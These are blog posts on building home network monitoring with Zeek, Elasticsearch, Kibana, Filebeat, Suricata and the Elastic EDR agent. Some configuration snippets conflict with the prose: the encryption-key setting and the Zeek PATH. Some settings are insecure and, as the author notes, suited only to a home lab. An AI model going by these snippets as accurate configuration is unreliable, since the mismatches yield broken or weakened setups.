Configuring Beats (Zeek) SSL

For the next step, we need to configure SSL for our host running Zeek and Beats. If you’re not running Zeek or any other product that uses a Filebeats module like Suricata, Windows Event Log, etc.. then you can skip this step.

First copy your certificates over to your host running Zeek, then create the cert directories with the correct permissions. You’ll need to copy both the Zeek certificates and the CA certificate.

mkdir /etc/filebeat/certs/ca -p
cp ca/ca.crt /etc/filebeat/certs/ca
cp zeek/zeek.crt /etc/filebeat/certs
cp zeek/zeek.key /etc/filebeat/certs
chmod 770 -R /etc/filebeat/certs

Next, we need to add our changes to the /etc/filebeat/filebeat.yml

First our Elasticsearch config settings.

# Elastic Output
output.elasticsearch.hosts: ['192.168.1.232:9200']
output.elasticsearch.protocol: https
output.elasticsearch.ssl.certificate: "/etc/filebeat/certs/zeek.crt"
output.elasticsearch.ssl.key: "/etc/filebeat/certs/zeek.key"
output.elasticsearch.ssl.certificate_authorities: ["/etc/filebeat/certs/ca/ca.crt"]

And then our Kibana config settings.

# Kibana Host
host: "https://192.168.1.232:5601"
  ssl.enabled: true
  ssl.certificate_authorities: ["/etc/filebeat/certs/ca/ca.crt"]
  ssl.certificate: "/etc/filebeat/certs/zeek.crt"
  ssl.key: "/etc/filebeat/certs/zeek.key"

Then restart Filebeat.

service filebeat restart

Now you can check that FileBeats is able to contact Elastic by running the command below. Everything should return back “ok”.

filebeat test output

Adding Authentication

We also need to add authentication to Elastic. This is pretty easy to do. Firstly enabled X-Pack by editing your /etc/elasticsearch/elasticsearch.yml

# X-Pack Setting
xpack.security.enabled: true

Next, we need to generate passwords for all of our built-in Elastic roles and users. There’s a tool included with Elasticsearch to do this. Run the command below to generate these passwords and save them somewhere safe (password manager). We’ll be using the Elastic password for the next part.

/usr/share/elasticsearch/bin/elasticsearch-setup-passwords auto

Next, add the newly created Elastic credential to your Filebeat config file, /etc/filebeat/filebeat.yml

# Elastic Credentials
output.elasticsearch.username: "elastic"
output.elasticsearch.password: "Your_Elastic_Pass_Here"

Restart Filebeat.

service filebeat restart

Next, do the same for your Kibana config file, /etc/kibana/kibana.yml. Also, enable X-Pack here as well.

# Elastic Credentials
xpack.security.enabled: true
elasticsearch.username: "elastic"
elasticsearch.password: "Your_Elastic_Pass_Here"

Restart Kibana.

service kibana restart

You should now see a login box when you navigate to your Kibana IP address.

Kibana SSL

Adding data to Elasticsearch

So we now have everything set up, the next thing we need to do is start ingesting data into Elasticsearch. In my case, I’m going to be using Zeek to tap my network traffic. I’ve already covered how to do this in my previous two blogs so I’m not going to cover it again here.

To see how to install Zeek, read part 1 here.

And to see how to configure the Filebeat Zeek module, read from “Configuring Zeek” in my part 2 blog here.

Enabling Detections

Once you have completed all the above steps, and have data ingesting into Elastic, you will probably notice that you are still unable to create detections. There is one final step to complete. Edit your Kibana config file, /etc/kibana/kibana.yml and add a xpack.encryptedSavedObjects.encryptionKey. I believe this can be any 32 character string.

# X-Pack Key 
xpack.security.encryptionKey: "something_at_least_32_characters"

You should now be able to view the built-in detection rules and create your own. We’ll look at how to create rules in another future post.

Elastic SIEM detections

Installing Elastic EDR Agent

Now we’re ready to install Elastic EDR First, navigate to the “Fleet” dashboard by clicking on the link under the management tab located on the side menu.

Elastic EDR install

From the fleet management menu, click “add agent”. Now it’s likely that you’ll be requested to add an integration policy before you can install agents, just follow the wizard and keep the defaults.

Elastic EDR install

We’re going to use the “Enroll in Fleet” option to install the EDR.

First, download the Elastic Agent onto your Windows/Linux Host.

Once you have the agent downloaded, keep the default policy selected under the Agent policy.

Before moving onto Step 3 we have another step to complete first.

Elastic EDR install

If we were to install the agent onto our Windows host now, we would receive an error that our self-signed certificate is from an untrusted source, and our agent install would fail.

So what we need to do is to add our CA certificate as a trusted certificate on our Windows host.

Install Certificates

First search for “Local Security Policy” in your Windows search bar. Then go to Security Settings > Public Key Policies > Certificate Path Validation Settings

Then, check the Define these policy settings and also check Allow user trusted root CAs to be used to validate certificates and Allow users to trust peer trust certificates options if they’re not already selected.

Finally check Third-Party Root CAs and Enterprise Root CAs.

Click apply and ok.

Elastic EDR install

Next search for certmgr.msc in the Windows Search Bar.

Then go to Trusted Root Certification Authorities > Certificates and right-click anywhere in the whitespace and select All Tasks > Import

Then simple follow the wizard and select the CA.crt we created earlier.

Elastic EDR install

Install the Agent

Now we’re ready to install the Elastic Agent. Copy the install command from the Fleet Dashboard and run it with PowerShell on your Windows host where the agent is located.

Elastic EDR config

If all has gone right, you should see the agent has been successfully enrolled via the fleet dashboard.

Elastic EDR SIEM

We’re not done yet however, we need to check that data is being ingested correctly into ElasticSearch from our agent. You can do this by navigating to the Data Streams tab. You should see this populated with endpoint data. If there is no data here, check your fleet settings by clicking the settings cog in the top right corner. Ensure that your ElasticSearch settings are properly set to the correct IP and not set to LocalHost.

Elastic EDR config

Finally, we need to enable detection rules for our EndPoint agent. Go to the detections dashboard in the Kibana Security app, and “enable” any endpoint rules you want.

Elastic EDR SIEM

Now you can test that it works, perform some badness on your Windows host and see what happens! In my case, Elastic EDR successfully detected and prevented both the Mimikatz files and also the process execution of Mimikatz.

Elastic EDR Mimikatz Block

We can also see this in our Kibana Security Detections Dashboard.

And we can also dive a little deeper with a nice little process try graphic, and overview of the event. Very cool!

Elastic EDR Process Tree Mimikatz

Conclusion

And so that brings this post to an end, I hope you’ve found it useful. So far with the limited testing I have done, I have found Elastic’s EDR to be impressive. It has the look and feel of an Enterprise-grade tool, which considering its open-source, is amazing. I plan to do some more thorough testing in the future to see how it performs, but as it stands it certainly seems to be leading EDR in the open-source world. It would be my go-to recommendation for small to medium businesses who may not have the budget for other expensive tools. The question is, can it give the big paid tools a run for their money.

Resources

https://www.elastic.co/guide/index.html

https://www.elastic.co/endpoint-security/

https://docs.zeek.org/en/current/

Home Monitoring: Sending Zeek logs to ELK

Prerequisites

This post marks the second instalment of the “Create enterprise monitoring at home” series, here is part one in case you missed it. In this post, we’ll be looking at how to send Zeek logs to ELK Stack using Filebeat. A few things to note before we get started,

  • I’m running ELK in its own VM, separate from my Zeek VM, but you can run it on the same VM if you want.
    • ELK is running on a Ubuntu 18.04 VM.
  • It’s pretty easy to break your ELK stack as it’s quite sensitive to even small changes, I’d recommend taking regular snapshots of your VMs as you progress along.

Installing Elastic

Installing Elastic is fairly straightforward, firstly add the PGP key used to sign the Elastic packages.

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -

If you need to, add the apt-transport-https package.

sudo apt-get install apt-transport-https

Then add the elastic repository to your source list.

echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list

Finally install the ElasticSearch package.

sudo apt-get update && sudo apt-get install elasticsearch

Once installed, we need to make one small change to the ElasticSearch config file, /etc/elasticsearch/elasticsearch.yml. We’re going to set the bind address as 0.0.0.0, this will allow us to connect to ElasticSearch from any host on our network. It’s worth noting, that putting the address 0.0.0.0 here isn’t best practice, and you wouldn’t do this in a production environment, but as we are just running this on our home network it’s fine.

Once that’s done, let’s start the ElasticSearch service, and check that it’s started up properly.

sudo service elasticsearch start
sudo service elasticsearch status 

You should get a green light and an active running status if all has gone well. Next, we want to make sure that we can access Elastic from another host on our network. I’m going to use my other Linux host running Zeek to test this. Run the curl command below from another host, and make sure to include the IP of your Elastic host.

curl -X GET "IP OF YOUR ELASTIC HOST:9200/?pretty" 

If all has gone right, you should get a reponse simialr to the one below.

Installing Kibana

Now it’s time to install and configure Kibana, the process is very similar to installing elastic search. We’ve already added the Elastic APT repository so it should just be a case of installing the Kibana package.

sudo apt-get update && sudo apt-get install kibana

One it’s installed we want to make a change to the config file, similar to what we did with ElasticSearch. Change the server host to 0.0.0.0 in the /etc/kibana/kibana.yml file.

Once it’s installed, start the service and check the status to make sure everything is working properly.

sudo service kibana start
sudo service kibana status 

You should get a green light and an active running status if all has gone well. Now let’s check that everything is working and we can access Kibana on our network. Browse to the IP address hosting kibana and make sure to specify port 5601, or whichever port you defined in the config file. You should see a page similar to the one below.

Configuring Zeek

Now that we’ve got ElasticSearch and Kibana set up, the next step is to get our Zeek data ingested into ElasticSearch. There are a couple of ways to do this. Kibana has a Filebeat module specifically for Zeek, so we’re going to utilise this module.

First, go to the SIEM app in Kibana, do this by clicking on the SIEM symbol on the Kibana toolbar, then click the “add data” button. As shown in the image below, the Kibana SIEM supports a range of log sources, click on the “Zeek logs” button.

You have to install Filebeats on the host where you are shipping the logs from. So in our case, we’re going to install Filebeat onto our Zeek server. Follow the instructions specified on the page to install Filebeats, once installed edit the filebeat.yml configuration file and change the appropriate fields. The username and password for Elastic should be kept as the default unless you’ve changed it. Make sure to change the Kibana output fields as well.

Once that is done, we need to configure Zeek to convert the Zeek logs into JSON format. First, stop Zeek from running.

zeekctl stop

Then edit the line @load policy/tuning/json-logs.zeek to the file  /opt/zeek/share/zeek/site/local.zeek

Restart zeek

zeekctl deploy

And now check that the logs are in JSON format. Even if you are not familiar with JSON, the format of the logs should look noticeably different than before.

tail -f /opt/zeek/logs/current/dns.log

Now we need to configure the Zeek Filebeat module. First, enable the module.

sudo filebeat modules enable zeek

Then edit the config file, /etc/filebeat/modules.d/zeek.yml. We need to specify each individual log file created by Zeek, or at least the ones that we wish for Elastic to ingest. For each log file in the /opt/zeek/logs/ folder, the path of the “current” log, and any previous log have to be defined, as shown below.

dns:
   enabled: true
   var.paths: [ "/opt/zeek/logs/current/dns.log", "/opt/zeek/logs/*.dns.json" ]

If there are some default log files in the opt folder, like capture_loss.log that you do not wish to be ingested by Elastic then simply set the “enabled” field as false. It’s important to set any logs sources which do not have a log file in /opt/zeek/logs as enabled: false, otherwise, you’ll receive an error. Also be sure to be careful with spacing, as YML files are space sensitive.

Once that’s done, you should be pretty much good to go, launch Filebeat, and start the service.

sudo filebeat setup
sudo service filebeat start

If everything has gone right, you should get a successful message after checking the

If you go the network dashboard within the SIEM app you should see the different dashboards populated with data from Zeek! The dashboards here give a nice overview of some of the data collected from our network. We’ll learn how to build some more protocol-specific dashboards in the next post in this series.

Enriching with Suricata

This next step is an additional extra, it’s not required as we have Zeek up and working already. However adding an IDS like Suricata can give some additional information to network connections we see on our network, and can identify malicious activity. Some people may think adding Suricata to our SIEM is a little redundant as we already have an IDS in place with Zeek, but this isn’t really true. While Zeek is often described as an IDS, it’s not really in the traditional sense. Zeek collects metadata for connections we see on our network, while there are scripts and additional packages that can be used with Zeek to detect malicious activity, it does not necessarily do this on its own. Suricata is more of a traditional IDS and relies on signatures to detect malicious activity. Now I often question the reliability of signature-based detections, as they are often very false positive heavy, but they can still add some value, particularly if well-tuned.

Installing Suricata

I’m not going to detail every step of installing and configuring Suricata, as there are already many guides online which you can use. I used this guide as it shows you how to get Suricata set up quickly. I’m going to install Suricata on the same host that is running Zeek, but you can set up and new dedicated VM for Suricata if you wish. Just make sure you assign your mirrored network interface to the VM, as this is the interface in which Suricata will run against.

Once you have Suricata set up its time configure Filebeat to send logs into ElasticSearch, this is pretty simple to do. Navigate to the SIEM app in Kibana, click on the “add data” button, and select Suricata Logs

Follow the instructions, they’re all fairly straightforward and similar to when we imported the Zeek logs earlier. Step 3 is the only step that’s not entirely clear, for this step, edit the /etc/filebeat/modules.d/suricata.yml by specifying the path of your suricata.json file.

var.paths: ["/my/path/suricata.json"]

Once that’s done, complete the setup with the following commands.

./filebeat setup
./filebeat -e

If all has gone right, you should recieve a success message when checking if data has been ingested.

We can also confirm this by checking the networks dashboard in the SIEM app, here we can see a break down of events from Filebeat.

Conclusion

And that brings this post to an end! It’s fairly simple to add other log source to Kibana via the SIEM app now that you know how. I’d recommend adding some endpoint focused logs, Winlogbeat is a good choice.

I’d say the most difficult part of this post was working out how to get the Zeek logs into ElasticSearch in the correct format with Filebeat. It’s not very well documented. In the next post in this series, we’ll look at how to create some Kibana dashboards with the data we’ve ingested.

Create enterprise monitoring at home with Zeek and Elk (Part 1)

Intro

In this series, I’m going to show you how you can utilise open source technology to build your own network monitoring solution good enough to be deployed in any enterprise environment! The two core technologies that we’re going to use are Zeek (formerly Bro) and ELK.

For those unaware, Zeek is an open-source network monitoring framework which creates alerts and events based from data collected by a network tap. One way in which I used to describe Zeek to people is that it’s essentially an IDS but on steroids. It’s used throughout the industry, especially in the network anomaly space, in fact, the UK cybersecurity company Darktrace uses Zeek as a key component of their product.

The plan for this solution is to tap our home network with Zeek and feed the logs into Elk, with Elk we can run queries across our data, build out some beautiful dashboards with Kibana, and even create some analytics to automate some detections. We will also look into deploying an endpoint agent on some devices to and feed those logs into ELK too.

Prerequisites

In order to follow along, you’ll need

  • A server/old PC capable of running Zeek and ELK
    • In my case, I have an HP Proliant ML350e running ESXI
    • The server needs to have a minimum of 2 free network ports
    • And for it to run smoothly at least 8GB memory and a decent processor.
  • A managed network switch which is capable of port mirroring.

Network Architecture

The diagram below shows a rough guide to my home network. The key points to take from this diagram are the mirror tap on the network and the mirror connection. To get the most out of Zeek, you need to tap the connection on your switch that goes to your router, essentially the connection from your LAN to the internet. By doing this we will capture all traffic from our home networking going out to the internet, from devices like iPhones connected to the Wi-Fi and the PiHole acting as our DNS server.

VMware Setup

You should first check that your physical NICs on your server are visible in ESXI. Go to networking>Physical NICs in ESXi and you should see them there.

Both of these physical connections should connect into your switch, with one going into your mirror port, and the other a regular switch port. You can set your mirror port in your switch config. I have a Netgear GS110TP where port 2 is the one that goes into my router, and I have port 6 free, so that is the one I’ll configure to be the mirror port.

You’ll need to know which ports on your server correspond to which ESXi physical ports. For example, port 6 on my switch plugs into Eth1 on my server, and Eth1 is called vmnic1 in ESXi. So vmnic1 will be the mirror NIC.

Next, we need to create a virtual switch will be used for the mirror data. Go to Networking > Virtual Switches > Add Standard Virtual Switch, and enter the details shown below, selecting your mirror NIC as “Uplink 1”. Make sure that you set promiscuous mode as “accept”.

Now add a port group by going to Networking> Port Groups > Add port group, and assign the virual switch you just created to it. Again make sure Promiscuous mode is enabled.

Now you’re ready to create your virtual machine, I’m using Ubuntu Server 18.04 for mine. When creating you VM, make sure you add both network adapters, including the one you’re using for the Mirrored traffic.

Preparing for Zeek

Once you’ve got Ubuntu installed, do the usual updates.

sudo apt-get update
sudo apt-get upgrade

Now check that both of your network interfaces are detected by Ubuntu. It is highly likely that your Mirror port will be down. As you can see from the image below, both of my interfaces are detected but only the management interface (ens160) is up with an IP address assigned.

To fix this, let’s first put the interface into promiscuous mode, and then bring it “up”.

ip link set "your mirror int" promisc on
ip link set "your mirror int" up

Lets now check that we’re receiving traffic on the mirror port by running tcpdump.

tcpdump -i "your mirror int" 

If everything has worked, you should see the mirrored traffic flowing through the interface similar to the image below.

Installing Zeek

We’re now ready to crack on and install Zeek. To start, we need to install all the perquisites. Do so by running the command below.

sudo apt-get install cmake make gcc g++ flex bison libpcap-dev libssl-dev python-dev swig zlib1g-dev

Next we need to create the working directory for Zeek, for some reason Zeek does not do this by default on install.

sudo mkdir /opt/zeek
sudo chown -R zeek:zeek /opt/zeek
sudo chmod 740 /opt/zeek

Next download Zeek with GIT

git clone -–recursive https://github.com/zeek/zeek

Unpack the compressed files, and enter the Zeek download directory. Then set the /opt/Zeek directory we created earlier as the install directory.

cd /home/paul/zeek
./configure --prefix=/opt/zeek

Now we’re ready to install Zeek, run the following make commands, and leave it to install (this can take some time)

make
make install 

Next we need to add the PATH environment variable

export PATH=/usr/local/zeek/bin:$PATH

And now we need to do add some basic config to the node.cfg file which is located in the /opt/etc/ directory. Uncomment the manager, proxy and worker-1 settings, and define your mirror interface in the worker-1 settings.

Now we’re ready to deploy Zeek by running the command below

zeekctl deploy

If all goes well we should not get any errors, and we can check to make sure everything started up properly by checking the status of zeek.

zeekctl status

Everything looks good! So now let’s go and check our logs where our captured data is being written to. Logs are located in directory /opt/zeek/logs/
The directory “current” holds the logs for the current day, while logs from previous days are archived off into their own directories. There’s also a different log file for different data types, like DNS connections, HTTP connections, etc…

Lets check the DNS logs

tail -f dns.log

Awesome! So everything is working correctly!

That concludes this post, keep an eye out for part 2 of this series, we’re going to deploy ELK and feed our logs into Elastic Search where we can build some beautiful dashboards to display our captured data.

Copyright © 2024 On The Hunt

Theme by Anders NorenUp ↑